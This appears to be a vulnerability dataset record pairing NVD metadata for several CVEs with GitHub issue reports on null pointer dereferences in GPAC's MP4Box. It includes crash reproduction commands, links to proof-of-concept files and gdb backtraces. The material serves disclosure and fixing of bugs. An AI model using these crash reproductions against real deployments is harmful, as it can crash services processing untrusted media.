{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1967" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1967" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "56FF2AB9-517D-43A7-867E-9FB6B833194F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1967
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ A null pointer dereference was discovered in gf_svg_get_attribute_name(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -lsr poc_4 ``` [poc_4.zip](https://github.com/gpac/gpac/files/7693449/poc_4.zip) **Result** ``` [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 796312 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 796312 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 LASeR Scene Parsing Scene loaded - dumping 1 systems streams [1] 3570050 segmentation fault ./MP4Box -lsr ./poc/poc_4 ``` **gdb** ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff78e16ac in gf_svg_get_attribute_name () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x0 RBX 0x5555555decb0 —▸ 0x5555555d4350 ◂— 0x0 RCX 0x0 RDX 0x7ffff7f7c428 (xml_elements+8) ◂— 0x300000422 RDI 0x0 RSI 0x0 R8 0x0 R9 0xa R10 0x7ffff7e45bd4 ◂— 0x6e696f7020002022 /* '" ' */ R11 0x7fffffff6ee7 ◂— 0xbffcbef5d8160036 /* '6' */ R12 0x5555555df180 —▸ 0x5555555d4350 ◂— 0x0 R13 0x0 R14 0x7ffff7e10cf4 ◂— 'textContent' R15 0x7ffff7df5e9b ◂— 0x663325002f2e2e00 RBP 0x7fffffff7080 ◂— 0x344e /* 'N4' */ RSP 0x7fffffff6fe0 ◂— 0x25286574616c736e ('nslate(%') RIP 0x7ffff78e16ac (gf_svg_get_attribute_name+28) ◂— mov rax, qword ptr [rdi] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 0x7ffff78e16ac <gf_svg_get_attribute_name+28> mov rax, qword ptr [rdi] 0x7ffff78e16af <gf_svg_get_attribute_name+31> movzx ecx, word ptr [rax] 0x7ffff78e16b2 <gf_svg_get_attribute_name+34> xor eax, eax 0x7ffff78e16b4 <gf_svg_get_attribute_name+36> cmp cx, 0x408 0x7ffff78e16b9 <gf_svg_get_attribute_name+41> jne gf_svg_get_attribute_name+64 <gf_svg_get_attribute_name+64> ↓ 0x7ffff78e16d0 <gf_svg_get_attribute_name+64> cmp dword ptr [rdx], ecx 0x7ffff78e16d2 <gf_svg_get_attribute_name+66> jne gf_svg_get_attribute_name+48 <gf_svg_get_attribute_name+48> ↓ 0x7ffff78e16c0 <gf_svg_get_attribute_name+48> add eax, 1 0x7ffff78e16c3 <gf_svg_get_attribute_name+51> add rdx, 0x10 0x7ffff78e16c7 <gf_svg_get_attribute_name+55> cmp eax, 0x4e 0x7ffff78e16ca <gf_svg_get_attribute_name+58> je gf_svg_get_attribute_name+365 <gf_svg_get_attribute_name+365> ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff6fe0 ◂— 0x25286574616c736e ('nslate(%') 01:0008│ 0x7fffffff6fe8 —▸ 0x5555555decb0 —▸ 0x5555555d4350 ◂— 0x0 02:0010│ 0x7fffffff6ff0 —▸ 0x7fffffff7080 ◂— 0x344e /* 'N4' */ 03:0018│ 0x7fffffff6ff8 —▸ 0x5555555df180 —▸ 0x5555555d4350 ◂— 0x0 04:0020│ 0x7fffffff7000 —▸ 0x5555555df2e0 ◂— 0x0 05:0028│ 0x7fffffff7008 —▸ 0x7ffff7e10cf4 ◂— 'textContent' 06:0030│ 0x7fffffff7010 —▸ 0x7ffff7df5e9b ◂— 0x663325002f2e2e00 07:0038│ 0x7fffffff7018 —▸ 0x7ffff7abae7a (DumpLSRAddReplaceInsert+938) ◂— mov r14, rax ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff78e16ac gf_svg_get_attribute_name+28 f 1 0x7ffff7abae7a DumpLSRAddReplaceInsert+938 f 2 0x7ffff7abb12b gf_sm_dump_command_list+219 f 3 0x7ffff7ac254c gf_sm_dump+1116 f 4 0x555555584418 dump_isom_scene+616 f 5 0x55555557b42c mp4boxMain+9228 f 6 0x7ffff75630b3 __libc_start_main+243 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 0x00007ffff78e16ac in gf_svg_get_attribute_name () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #1 0x00007ffff7abae7a in DumpLSRAddReplaceInsert () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #2 0x00007ffff7abb12b in gf_sm_dump_command_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #3 0x00007ffff7ac254c in gf_sm_dump () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #4 0x0000555555584418 in dump_isom_scene () #5 0x000055555557b42c in mp4boxMain () #6 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe188, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe178) at ../csu/libc-start.c:308 #7 0x000055555556c45e in _start () ```
Null Pointer Dereference in gf_svg_get_attribute_name()
https://api.github.com/repos/gpac/gpac/issues/1967/comments
0
2021-12-10T14:38:22Z
2021-12-13T13:22:06Z
https://github.com/gpac/gpac/issues/1967
1,076,915,355
1,967
2,895
CVE-2021-44926
2021-12-21T21:15:07.847
A null pointer dereference vulnerability exists in gpac 1.1.0-DEV in the gf_node_get_tag function, which causes a segmentation fault and application crash.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1961" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1961" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "56FF2AB9-517D-43A7-867E-9FB6B833194F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1961
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ A null pointer dereference was discovered in gf_node_get_tag(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -lsr poc3 ``` [poc3.zip](https://github.com/gpac/gpac/files/7691603/poc3.zip) **Result** ``` [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 861218 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 861218 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 BIFS Scene Parsing [1] 3453407 segmentation fault ./MP4Box -lsr ``` **gdb** ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7849794 in gf_node_get_tag () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x0 RBX 0x0 RCX 0x0 RDX 0x5555555d2730 ◂— 0x0 RDI 0x0 RSI 0x5555555df860 ◂— 0x0 R8 0x0 R9 0x7 R10 0x7ffff775b844 ◂— 'gf_node_get_tag' R11 0x7ffff7849790 (gf_node_get_tag) ◂— endbr64 R12 0x5555555ded60 ◂— 0x0 R13 0x5555555df860 ◂— 0x0 R14 0x0 R15 0x7fffffff6d60 ◂— 0x31646c6569665f /* '_field1' */ RBP 0x5555555d2730 ◂— 0x0 RSP 0x7fffffff6be8 —▸ 0x7ffff7919836 (SFScript_Parse+54) ◂— cmp eax, 0x51 RIP 0x7ffff7849794 (gf_node_get_tag+4) ◂— mov rax, qword ptr [rdi] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── 0x7ffff7849790 <gf_node_get_tag> endbr64 ► 0x7ffff7849794 <gf_node_get_tag+4> mov rax, qword ptr [rdi] 0x7ffff7849797 <gf_node_get_tag+7> movzx eax, word ptr [rax] 0x7ffff784979a <gf_node_get_tag+10> ret 0x7ffff784979b nop dword ptr [rax + rax] 0x7ffff78497a0 <gf_node_get_id> endbr64 0x7ffff78497a4 <gf_node_get_id+4> mov rax, qword ptr [rdi] 0x7ffff78497a7 <gf_node_get_id+7> xor r8d, r8d 0x7ffff78497aa <gf_node_get_id+10> mov edx, dword ptr [rax + 4] 0x7ffff78497ad <gf_node_get_id+13> test edx, edx 0x7ffff78497af <gf_node_get_id+15> jns gf_node_get_id+66 <gf_node_get_id+66> ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff6be8 —▸ 0x7ffff7919836 (SFScript_Parse+54) ◂— cmp eax, 0x51 01:0008│ 0x7fffffff6bf0 ◂— 0x0 ... ↓ 2 skipped 04:0020│ 0x7fffffff6c08 ◂— 0x770000007c /* '|' */ 05:0028│ 0x7fffffff6c10 ◂— 0x5b0000006e /* 'n' */ 06:0030│ 0x7fffffff6c18 ◂— 0x770000007c /* '|' */ 07:0038│ 0x7fffffff6c20 ◂— 0x5b0000006e /* 'n' */ ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff7849794 gf_node_get_tag+4 f 1 0x7ffff7919836 SFScript_Parse+54 f 2 0x7ffff790e9cb gf_bifs_dec_sf_field+1195 f 3 0x7ffff7905f44 gf_bifs_dec_proto_list+628 f 4 0x7ffff7906549 BD_DecSceneReplace+73 f 5 0x7ffff7914e2e BM_SceneReplace+110 f 6 0x7ffff7914ff3 BM_ParseCommand+179 f 7 0x7ffff7915323 gf_bifs_decode_command_list+163 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 0x00007ffff7849794 in gf_node_get_tag () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #1 0x00007ffff7919836 in SFScript_Parse () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #2 0x00007ffff790e9cb in gf_bifs_dec_sf_field () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #3 0x00007ffff7905f44 in gf_bifs_dec_proto_list () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #4 0x00007ffff7906549 in BD_DecSceneReplace () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #5 0x00007ffff7914e2e in BM_SceneReplace () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #6 0x00007ffff7914ff3 in BM_ParseCommand () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #7 0x00007ffff7915323 in gf_bifs_decode_command_list () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #8 0x00007ffff7aa1da2 in gf_sm_load_run_isom () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #9 0x00005555555844a8 in dump_isom_scene () #10 0x000055555557b42c in mp4boxMain () #11 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe1a8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe198) at ../csu/libc-start.c:308 #12 0x000055555556c45e in _start () ```
Null Pointer Dereference in gf_node_get_tag()
https://api.github.com/repos/gpac/gpac/issues/1961/comments
0
2021-12-10T09:26:26Z
2021-12-10T10:16:33Z
https://github.com/gpac/gpac/issues/1961
1,076,617,776
1,961
2,896
CVE-2021-44927
2021-12-21T21:15:07.890
A null pointer dereference vulnerability exists in gpac 1.1.0 in the gf_sg_vrml_mf_append function, which causes a segmentation fault and application crash.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1960" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1960" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "56FF2AB9-517D-43A7-867E-9FB6B833194F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1960
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ A null pointer dereference was discovered in gf_sg_vrml_mf_append(). **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -bt ./poc2 ``` [poc2.zip](https://github.com/gpac/gpac/files/7691265/poc2.zip) **Result** ``` [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type e`ds in parent mp4s [iso file] Incomplete box mdat - start 11495 size 861283 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type e`ds in parent mp4s [iso file] Incomplete box mdat - start 11495 size 861283 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 BIFS Scene Parsing [1] 2696339 segmentation fault ./MP4Box -bt ./submit/poc2 ``` **gdb** ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff78a1074 in gf_sg_vrml_mf_append () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x0 RBX 0x7fffffff6c10 ◂— 0x3800000000 RCX 0x7fffffff6ce0 ◂— 0x2c00000000 RDX 0x7fffffff6c18 ◂— 0x0 RDI 0x0 RSI 0x2c R8 0x5555555df8d0 —▸ 0x5555555df840 ◂— 0x2c00 R9 0x7 R10 0x7ffff775be46 ◂— 'gf_sg_vrml_mf_append' R11 0x7ffff78a1070 (gf_sg_vrml_mf_append) ◂— endbr64 R12 0x7fffffff6ce0 ◂— 0x2c00000000 R13 0x5555555d5f80 ◂— 0x0 R14 0x0 R15 0x0 RBP 0x5555555ded90 ◂— 0x0 RSP 0x7fffffff6bc8 —▸ 0x7ffff790efa4 (BD_DecMFFieldList+212) ◂— test eax, eax RIP 0x7ffff78a1074 (gf_sg_vrml_mf_append+4) ◂— mov eax, dword ptr [rdi] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── 0x7ffff78a1070 <gf_sg_vrml_mf_append> endbr64 ► 0x7ffff78a1074 <gf_sg_vrml_mf_append+4> mov eax, dword ptr [rdi] 0x7ffff78a1076 <gf_sg_vrml_mf_append+6> lea ecx, [rax + 2] 0x7ffff78a1079 <gf_sg_vrml_mf_append+9> jmp gf_sg_vrml_mf_insert@plt <gf_sg_vrml_mf_insert@plt> ↓ 0x7ffff77e66a0 <gf_sg_vrml_mf_insert@plt> endbr64 0x7ffff77e66a4 <gf_sg_vrml_mf_insert@plt+4> bnd jmp qword ptr [rip + 0x7ba34d] <0x7ffff77dd3f0> ↓ 0x7ffff77dd3f0 endbr64 0x7ffff77dd3f4 push 0x73c 0x7ffff77dd3f9 bnd jmp 0x7ffff77d6020 <0x7ffff77d6020> ↓ 0x7ffff77d6020 push qword ptr [rip + 0x7c6fe2] <0x7ffff7f9d008> 0x7ffff77d6026 bnd jmp qword ptr [rip + 0x7c6fe3] <0x7ffff7fe7bb0> ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff6bc8 —▸ 0x7ffff790efa4 (BD_DecMFFieldList+212) ◂— test eax, eax 01:0008│ 0x7fffffff6bd0 ◂— 0x0 02:0010│ 0x7fffffff6bd8 ◂— 0x0 03:0018│ 0x7fffffff6be0 ◂— 0x50 /* 'P' */ 04:0020│ 0x7fffffff6be8 ◂— 0x0 05:0028│ 0x7fffffff6bf0 —▸ 0x7fffffff6d10 ◂— 0x30646c6569665f /* '_field0' */ 06:0030│ 0x7fffffff6bf8 —▸ 0x7fffffff6c08 ◂— 0x0 07:0038│ 0x7fffffff6c00 —▸ 0x7fffffff6d10 ◂— 0x30646c6569665f /* '_field0' */ ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff78a1074 gf_sg_vrml_mf_append+4 f 1 0x7ffff790efa4 BD_DecMFFieldList+212 f 2 0x7ffff7906006 gf_bifs_dec_proto_list+822 f 3 0x7ffff7906549 BD_DecSceneReplace+73 f 4 0x7ffff7914e2e BM_SceneReplace+110 f 5 0x7ffff7914ff3 BM_ParseCommand+179 f 6 0x7ffff7915323 gf_bifs_decode_command_list+163 f 7 0x7ffff7aa1da2 gf_sm_load_run_isom+1218 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 0x00007ffff78a1074 in gf_sg_vrml_mf_append () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #1 0x00007ffff790efa4 in BD_DecMFFieldList () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #2 0x00007ffff7906006 in gf_bifs_dec_proto_list () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #3 0x00007ffff7906549 in BD_DecSceneReplace () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #4 0x00007ffff7914e2e in BM_SceneReplace () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #5 0x00007ffff7914ff3 in BM_ParseCommand () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #6 0x00007ffff7915323 in gf_bifs_decode_command_list () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #7 0x00007ffff7aa1da2 in gf_sm_load_run_isom () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #8 0x00005555555844a8 in dump_isom_scene () #9 0x000055555557b42c in mp4boxMain () #10 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe158, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe148) at ../csu/libc-start.c:308 #11 0x000055555556c45e in _start () ```
Null Pointer Dereference in gf_sg_vrml_mf_append()
https://api.github.com/repos/gpac/gpac/issues/1960/comments
0
2021-12-10T08:38:06Z
2021-12-10T10:01:23Z
https://github.com/gpac/gpac/issues/1960
1,076,577,157
1,960
2,897
CVE-2021-45459
2021-12-22T06:15:07.130
lib/cmd.js in the node-windows package before 1.0.0-beta.6 for Node.js allows command injection via the PID parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/coreybutler/node-windows/compare/1.0.0-beta.5...1.0.0-beta.6" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/dwisiswant0/advisory/issues/4" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220107-0004/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/coreybutler/node-windows/compare/1.0.0-beta.5...1.0.0-beta.6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/dwisiswant0/advisory/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220107-0004/" } ]
